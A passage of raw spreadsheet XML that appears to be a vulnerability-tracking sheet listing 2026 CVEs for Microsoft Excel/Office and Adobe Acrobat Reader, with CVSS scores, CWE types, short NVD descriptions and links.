t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t></is></c></row><row r="644"><c r="A644" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C644" s="5" t="inlineStr"><is><t>CVE-2026-81947</t></is></c><c r="D644" s="5" t="n"><v>7.8</v></c><c r="E644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F644" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G644" s="5" t="inlineStr" /><c r="H644" s="5" t="n"><v>0.003</v></c><c r="I644" s="5" t="inlineStr" /><c r="J644" s="5" t="inlineStr" /><c r="K644" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L644" s="5" t="inlineStr" /><c r="M644" s="5" t="inlineStr" /><c r="N644" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P644" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q644" s="5" t="inlineStr" /><c r="R644" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S644" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t></is></c></row><row r="645"><c r="A645" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C645" s="5" t="inlineStr"><is><t>CVE-2026-81948</t></is></c><c r="D645" s="5" t="n"><v>7.8</v></c><c r="E645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F645" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G645" s="5" t="inlineStr" /><c r="H645" s="5" t="n"><v>0.004</v></c><c r="I645" s="5" t="inlineStr" /><c r="J645" s="5" t="inlineStr" /><c r="K645" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L645" s="5" t="inlineStr" /><c r="M645" s="5" t="inlineStr" /><c r="N645" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P645" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q645" s="5" t="inlineStr" /><c r="R645" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S645" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t></is></c></row><row r="646"><c r="A646" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C646" s="5" t="inlineStr"><is><t>CVE-2026-81949</t></is></c><c r="D646" s="5" t="n"><v>7.8</v></c><c r="E646" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F646" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G646" s="5" t="inlineStr" /><c r="H646" s="5" t="n"><v>0.004</v></c><c r="I646" s="5" t="inlineStr" /><c r="J646" s="5" t="inlineStr" /><c r="K646" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L646" s="5" t="inlineStr" /><c r="M646" s="5" t="inlineStr" /><c r="N646" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P646" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q646" s="5" t="inlineStr" /><c r="R646" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S646" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t></is></c></row><row r="647"><c r="A647" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C647" s="5" t="inlineStr"><is><t>CVE-2026-81950</t></is></c><c r="D647" s="5" t="n"><v>7.8</v></c><c r="E647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F647" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G647" s="5" t="inlineStr" /><c r="H647" s="5" t="n"><v>0.004</v></c><c r="I647" s="5" t="inlineStr" /><c r="J647" s="5" t="inlineStr" /><c r="K647" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L647" s="5" t="inlineStr" /><c r="M647" s="5" t="inlineStr" /><c r="N647" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P647" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q647" s="5" t="inlineStr" /><c r="R647" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S647" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t></is></c></row><row r="648"><c r="A648" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C648" s="5" t="inlineStr"><is><t>CVE-2026-81951</t></is></c><c r="D648" s="5" t="n"><v>7.8</v></c><c r="E648" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F648" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G648" s="5" t="inlineStr" /><c r="H648" s="5" t="n"><v>0.004</v></c><c r="I648" s="5" t="inlineStr" /><c r="J648" s="5" t="inlineStr" /><c r="K648" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L648" s="5" t="inlineStr" /><c r="M648" s="5" t="inlineStr" /><c r="N648" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P648" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q648" s="5" t="inlineStr" /><c r="R648" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S648" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t></is></c></row><row r="649"><c r="A649" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C649" s="5" t="inlineStr"><is><t>CVE-2026-81953</t></is></c><c r="D649" s="5" t="n"><v>7.8</v></c><c r="E649" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F649" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G649" s="5" t="inlineStr" /><c r="H649" s="5" t="n"><v>0.004</v></c><c r="I649" s="5" t="inlineStr" /><c r="J649" s="5" t="inlineStr" /><c r="K649" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L649" s="5" t="inlineStr" /><c r="M649" s="5" t="inlineStr" /><c r="N649" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P649" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q649" s="5" t="inlineStr" /><c r="R649" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S649" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t></is></c></row><row r="650"><c r="A650" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C650" s="5" t="inlineStr"><is><t>CVE-2026-81954</t></is></c><c r="D650" s="5" t="n"><v>7.8</v></c><c r="E650" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F650" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G650" s="5" t="inlineStr" /><c r="H650" s="5" t="n"><v>0.003</v></c><c r="I650" s="5" t="inlineStr" /><c r="J650" s="5" t="inlineStr" /><c r="K650" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L650" s="5" t="inlineStr" /><c r="M650" s="5" t="inlineStr" /><c r="N650" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P650" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q650" s="5" t="inlineStr" /><c r="R650" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S650" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t></is></c></row><row r="651"><c r="A651" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C651" s="5" t="inlineStr"><is><t>CVE-2026-81956</t></is></c><c r="D651" s="5" t="n"><v>7.8</v></c><c r="E651" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F651" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G651" s="5" t="inlineStr" /><c r="H651" s="5" t="n"><v>0.004</v></c><c r="I651" s="5" t="inlineStr" /><c r="J651" s="5" t="inlineStr" /><c r="K651" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L651" s="5" t="inlineStr" /><c r="M651" s="5" t="inlineStr" /><c r="N651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P651" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q651" s="5" t="inlineStr" /><c r="R651" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S651" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t></is></c></row><row r="652"><c r="A652" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C652" s="5" t="inlineStr"><is><t>CVE-2026-81957</t></is></c><c r="D652" s="5" t="n"><v>7.8</v></c><c r="E652" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F652" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G652" s="5" t="inlineStr" /><c r="H652" s="5" t="n"><v>0.004</v></c><c r="I652" s="5" t="inlineStr" /><c r="J652" s="5" t="inlineStr" /><c r="K652" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L652" s="5" t="inlineStr" /><c r="M652" s="5" t="inlineStr" /><c r="N652" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P652" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q652" s="5" t="inlineStr" /><c r="R652" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S652" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T652" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t></is></c></row><row r="653"><c r="A653" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C653" s="5" t="inlineStr"><is><t>CVE-2026-81959</t></is></c><c r="D653" s="5" t="n"><v>7.8</v></c><c r="E653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F653" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G653" s="5" t="inlineStr" /><c r="H653" s="5" t="n"><v>0.004</v></c><c r="I653" s="5" t="inlineStr" /><c r="J653" s="5" t="inlineStr" /><c r="K653" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L653" s="5" t="inlineStr" /><c r="M653" s="5" t="inlineStr" /><c r="N653" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P653" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q653" s="5" t="inlineStr" /><c r="R653" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S653" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T653" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t></is></c></row><row r="654"><c r="A654" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C654" s="5" t="inlineStr"><is><t>CVE-2026-81960</t></is></c><c r="D654" s="5" t="n"><v>7.8</v></c><c r="E654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F654" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G654" s="5" t="inlineStr" /><c r="H654" s="5" t="n"><v>0.004</v></c><c r="I654" s="5" t="inlineStr" /><c r="J654" s="5" t="inlineStr" /><c r="K654" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L654" s="5" t="inlineStr" /><c r="M654" s="5" t="inlineStr" /><c r="N654" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P654" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q654" s="5" t="inlineStr" /><c r="R654" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S654" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T654" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t></is></c></row><row r="655"><c r="A655" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C655" s="5" t="inlineStr"><is><t>CVE-2026-81973</t></is></c><c r="D655" s="5" t="n"><v>7.8</v></c><c r="E655" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F655" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G655" s="5" t="inlineStr" /><c r="H655" s="5" t="n"><v>0.002</v></c><c r="I655" s="5" t="inlineStr" /><c r="J655" s="5" t="inlineStr" /><c r="K655" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L655" s="5" t="inlineStr" /><c r="M655" s="5" t="inlineStr" /><c r="N655" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P655" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q655" s="5" t="inlineStr" /><c r="R655" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S655" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T655" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t></is></c></row><row r="656"><c r="A656" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C656" s="5" t="inlineStr"><is><t>CVE-2026-81975</t></is></c><c r="D656" s="5" t="n"><v>7.8</v></c><c r="E656" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F656" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G656" s="5" t="inlineStr" /><c r="H656" s="5" t="n"><v>0.002</v></c><c r="I656" s="5" t="inlineStr" /><c r="J656" s="5" t="inlineStr" /><c r="K656" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L656" s="5" t="inlineStr" /><c r="M656" s="5" t="inlineStr" /><c r="N656" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P656" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q656" s="5" t="inlineStr" /><c r="R656" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S656" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T656" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t></is></c></row><row r="657"><c r="A657" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C657" s="5" t="inlineStr"><is><t>CVE-2026-81976</t></is></c><c r="D657" s="5" t="n"><v>7.8</v></c><c r="E657" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F657" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G657" s="5" t="inlineStr" /><c r="H657" s="5" t="n"><v>0.002</v></c><c r="I657" s="5" t="inlineStr" /><c r="J657" s="5" t="inlineStr" /><c r="K657" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L657" s="5" t="inlineStr" /><c r="M657" s="5" t="inlineStr" /><c r="N657" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P657" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q657" s="5" t="inlineStr" /><c r="R657" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S657" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T657" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t></is></c></row><row r="658"><c r="A658" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C658" s="5" t="inlineStr"><is><t>CVE-2026-81979</t></is></c><c r="D658" s="5" t="n"><v>7.8</v></c><c r="E658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F658" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G658" s="5" t="inlineStr" /><c r="H658" s="5" t="n"><v>0.002</v></c><c r="I658" s="5" t="inlineStr" /><c r="J658" s="5" t="inlineStr" /><c r="K658" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L658" s="5" t="inlineStr" /><c r="M658" s="5" t="inlineStr" /><c r="N658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P658" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q658" s="5" t="inlineStr" /><c r="R658" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S658" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T658" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t></is></c></row><row r="659"><c r="A659" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C659" s="5" t="inlineStr"><is><t>CVE-2026-81980</t></is></c><c r="D659" s="5" t="n"><v>7.8</v></c><c r="E659" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F659" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G659" s="5" t="inlineStr" /><c r="H659" s="5" t="n"><v>0.002</v></c><c r="I659" s="5" t="inlineStr" /><c r="J659" s="5" t="inlineStr" /><c r="K659" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L659" s="5" t="inlineStr" /><c r="M659" s="5" t="inlineStr" /><c r="N659" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P659" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q659" s="5" t="inlineStr" /><c r="R659" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S659" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T659" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t></is></c></row><row r="660"><c r="A660" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C660" s="5" t="inlineStr"><is><t>CVE-2026-81981</t></is></c><c r="D660" s="5" t="n"><v>7.8</v></c><c r="E660" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F660" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G660" s="5" t="inlineStr" /><c r="H660" s="5" t="n"><v>0.002</v></c><c r="I660" s="5" t="inlineStr" /><c r="J660" s="5" t="inlineStr" /><c r="K660" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L660" s="5" t="inlineStr" /><c r="M660" s="5" t="inlineStr" /><c r="N660" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P660" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q660" s="5" t="inlineStr" /><c r="R660" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S660" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T660" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t></is></c></row><row r="661"><c r="A661" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C661" s="5" t="inlineStr"><is><t>CVE-2026-81983</t></is></c><c r="D661" s="5" t="n"><v>7.8</v></c><c r="E661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F661" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G661" s="5" t="inlineStr" /><c r="H661" s="5" t="n"><v>0.002</v></c><c r="I661" s="5" t="inlineStr" /><c r="J661" s="5" t="inlineStr" /><c r="K661" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L661" s="5" t="inlineStr" /><c r="M661" s="5" t="inlineStr" /><c r="N661" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P661" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q661" s="5" t="inlineStr" /><c r="R661" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S661" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T661" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t></is></c></row><row r="662"><c r="A662" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C662" s="5" t="inlineStr"><is><t>CVE-2026-81985</t></is></c><c r="D662" s="5" t="n"><v>7.8</v></c><c r="E662" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F662" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G662" s="5" t="inlineStr" /><c r="H662" s="5" t="n"><v>0.002</v></c><c r="I662" s="5" t="inlineStr" /><c r="J662" s="5" t="inlineStr" /><c r="K662" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L662" s="5" t="inlineStr" /><c r="M662" s="5" t="inlineStr" /><c r="N662" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P662" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q662" s="5" t="inlineStr" /><c r="R662" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S662" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T662" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t></is></c></row><row r="663"><c r="A663" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C663" s="5" t="inlineStr"><is><t>CVE-2026-81986</t></is></c><c r="D663" s="5" t="n"><v>7.8</v></c><c r="E663" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F663" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G663" s="5" t="inlineStr" /><c r="H663" s="5" t="n"><v>0.002</v></c><c r="I663" s="5" t="inlineStr" /><c r="J663" s="5" t="inlineStr" /><c r="K663" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L663" s="5" t="inlineStr" /><c r="M663" s="5" t="inlineStr" /><c r="N663" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P663" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q663" s="5" t="inlineStr" /><c r="R663" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S663" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T663" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t></is></c></row><row r="664"><c r="A664" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C664" s="5" t="inlineStr"><is><t>CVE-2026-81987</t></is></c><c r="D664" s="5" t="n"><v>7.8</v></c><c r="E664" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F664" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G664" s="5" t="inlineStr" /><c r="H664" s="5" t="n"><v>0.002</v></c><c r="I664" s="5" t="inlineStr" /><c r="J664" s="5" t="inlineStr" /><c r="K664" s="5" 